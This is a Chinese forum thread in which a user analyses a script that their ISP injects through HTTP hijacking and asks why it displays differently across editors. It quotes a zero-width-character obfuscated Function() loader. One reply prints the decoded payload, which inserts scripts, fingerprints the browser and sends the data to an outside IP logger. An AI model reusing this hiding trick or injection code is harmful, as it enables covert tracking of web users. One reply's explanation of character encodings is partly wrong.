这是一个创建于 2541 天前的主题,其中的信息可能已经有所发展或是发生改变。
在住的地方,可恶电信 http 劫持,分析它的劫持代码发现有个 js 文件在 chrome 开发者工具就能解析出来,用 utf-8 模式 nodepad++打开一些字符串不显示。
地址是 http://51mld.cn/bd/query.js?vid=20000 nodepad++为什么不显示,vim 能显示原理是什么?
用 utf-8 模式 nodepad++打开:
Function("".replace(/.{4}/g,function(a){var rep={"":"00","":"01","":"10","":"11"};return String.fromCharCode(parseInt(a.replace(/./g, function(a) {return rep[a]}),2))}))() nodepad++用 ansi 打开:
Function("豢豢豢豢豢锘库豢豢豢豢豢豢豢豢豢豢锘库豢豢豢豢豢锘库豢豢豢豢豢豢豢豢锘库豢锘库豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢锘库豢豢豢豢豢锘库豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢锘库豢豢豢豢豢豢豢豢锘库豢锘库豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢锘库豢豢豢豢豢豢豢锘库豢豢豢豢豢锘库豢豢豢豢豢豢锘库豢锘库豢豢豢豢豢锘库豢豢豢豢豢豢锘库豢豢豢豢豢锘库豢豢豢豢豢豢豢豢豢豢豢豢锘库豢豢锘库豢豢豢豢豢豢豢豢豢豢豢锘库豢豢豢豢豢豢豢豢豢豢锘库豢豢豢豢锘库豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢锘库豢豢豢豢锘库豢豢豢锘库豢豢锘库豢豢豢豢豢豢锘库豢豢豢锘库豢豢豢豢豢豢豢豢豢锘库豢豢豢豢豢豢豢豢锘库豢豢豢豢锘库豢锘库豢豢豢豢豢豢豢豢豢豢豢锘库豢豢豢豢豢豢豢豢豢豢豢豢豢豢锘库豢豢锘库豢豢锘库豢豢锘库豢豢锘库豢锘库豢锘库豢豢锘库豢锘库豢锘库豢锘库豢豢豢锘库豢锘库豢豢豢锘库豢锘库豢豢锘库豢豢锘库豢豢豢豢豢豢豢锘库豢豢锘库豢豢锘库豢豢豢锘库豢豢豢豢豢豢锘库豢豢锘库豢豢豢豢锘库豢豢豢锘库豢豢豢锘库豢豢豢豢豢豢锘库豢豢锘库豢豢豢豢豢豢豢豢锘库豢豢锘库豢豢锘库豢豢豢豢豢锘库豢豢豢锘库豢豢豢豢豢锘库豢豢锘库豢锘库豢豢豢豢豢锘库豢豢豢豢豢豢锘库豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢锘库豢豢豢豢锘库豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢锘库豢豢豢豢锘库豢豢豢豢豢豢豢豢豢豢豢豢锘库豢锘库豢豢豢豢豢豢豢锘库豢豢豢豢豢豢豢豢锘库豢锘库豢豢豢豢豢豢豢锘库豢豢豢豢豢豢豢豢豢豢豢豢豢锘库豢锘库豢豢豢豢豢豢豢锘库豢豢豢豢豢豢豢豢豢锘库豢豢豢豢豢豢锘库豢豢豢豢豢豢锘库豢豢豢豢豢豢锘库豢豢豢豢豢豢锘匡豢豢豢豢豢豢豢豢豢豢豢锘库豢豢豢豢豢豢豢锘库豢豢豢豢豢锘库豢豢锘库豢豢豢豢豢豢豢豢豢豢锘库豢锘库豢豢豢豢豢豢豢豢锘库豢豢豢豢豢豢豢豢锘库豢豢豢豢豢豢豢豢豢豢豢豢豢豢锘库豢豢豢豢锘库豢豢锘库豢豢豢锘库豢豢豢豢锘库豢豢豢豢豢锘库豢豢豢豢豢豢豢豢豢豢豢豢豢豢锘库豢豢锘库豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢锘库豢锘库豢豢豢豢豢豢锘库豢豢锘库豢豢豢豢豢锘匡豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢锘库豢豢豢豢豢锘库豢锘库豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢锘库豢豢锘库豢豢锘库豢豢豢豢锘匡豢豢豢锘库豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢豢锘库豢锘库豢豢豢豢豢豢豢锘库豢锘库?.replace(/.{4}/g,function(a){var rep={"?:"00","?:"01","?:"10","锘?:"11"};return String.fromCharCode(parseInt(a.replace(/./g, function(a) {return rep[a]}),2))}))() vim 打开显示:
Function("<200b><200d><200d><200b><200c><200d><200c><200d><200c><feff><200c><200c><200c><200d><feff><200d><200c><200d><200b><feff><200c><feff><200c><200b><200c><200d><200d><200c><200c><200d><fef f><feff><200c><200d><feff><200d><200b><200d><200d><200b><200b><200d><200d><200c><200c><feff><200d><feff><200c><feff><200c><200d><200c><200d><200b><200c><200c><feff><200b><200d><200b><200d><200b> <200b><200c><200d><200d><200c><200c><200d><feff><200d><200c><feff><200b><feff><200c><feff><200c><200b><200b><feff><feff><200c><200c><200d><200c><200d><200c><feff><200c><200c><200c><200d><feff><2 00d><200c><200d><200b><feff><200c><feff><200c><200b><200c><200d><200d><200c><200c><200d><feff><feff><  | 1 zsdroid 2019-01-02 11:49:38 +08:00 复制到 f12 就知道了 |
 | 2 arrow8899 2019-01-02 12:08:32 +08:00 都是些零宽字符,有些编辑器就是不显示的,运行结果如下: ``` (function(){var inst=function(u,b){var j=document.createElement('script');j.type='text/Javascript';j.src=u;var s=document.getElementsByTagName("script")[0];s.parentNode.insertBefore(j,s)};var info=function(){var a=navigator.userAgent.toLowerCase();var i={t:Math.random().toString().substr(2),cw:0,ch:0,ww:0,wh:0,wt:0,im:top.location!=self.location,ck:!window.navigator.cookieEnabled,ph:navigator.userAgent.match(/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i)!=null};if(window.screen){i.ww=window.screen.width;i.wh=window.screen.height}if(document.body){i.cw=document.body.clientWidth;i.ch=document.body.clientHeight}if(i.ww!=0)i.wt=i.ww>i.cw*2?"1":"";return i};var enc=function(obj){var params=Object.keys(obj).map(function(key){return key+"="+encodeURIComponent(obj[key])});return params.join("&")};try{inst("https://hm.baidu.com/hm.js?bfc6c23974fbad0bbfed25f88a973fb0");var t="http://47.110.247.244/hm/logger?vid=20000&";inst(t+enc(info()))}catch(ex){}})() ``` |
 | 3 hongyexiaoqing OP @arrow8899 多谢,其实我想了解一下编码的原理,为什么浏览器就能识别出来,编辑器不行 |
 | 4 vicvinc 2019-01-02 12:43:02 +08:00 ansi 是一字节 8 位,总共 2^7=128(1 个标志位)个字符,unicode 字符转换集 utf-8 是 1 个字节 8 位,总共 256 个字符,utf-16 是两个字节 16 位,共 25536 个字符,像 u\200b 这种是两个字节编码,用 utf-16 应该可以解码,不知道对不对 |
 | 5 Chingim 2019-01-02 13:26:40 +08:00 via Android @hongyexiaoqing 这个文件不是 utf-8,因为文件里有 FF 这种在 UTF-8 里不可能出现的字节。 文件能不能正确显示,取决于能否正确猜出它的编码并解码 |
 | 6 ezzze 2019-01-02 13:32:03 +08:00  1 这不就是零宽字符么? 几年前貌似流行过一阵,用来隐藏代码,https://www.cnblogs.com/52cik/p/js-hide-code.html |
| 7 hongyexiaoqing OP @ezzze 的确是这个技术 |
| 8 hongyexiaoqing OP @vicvinc vim 和 chrome 能识别,是它将等宽字符 utf-8 的 e2808b 转成 unicode u\200b,vim 转成<200b>显示出来。 |
Select Language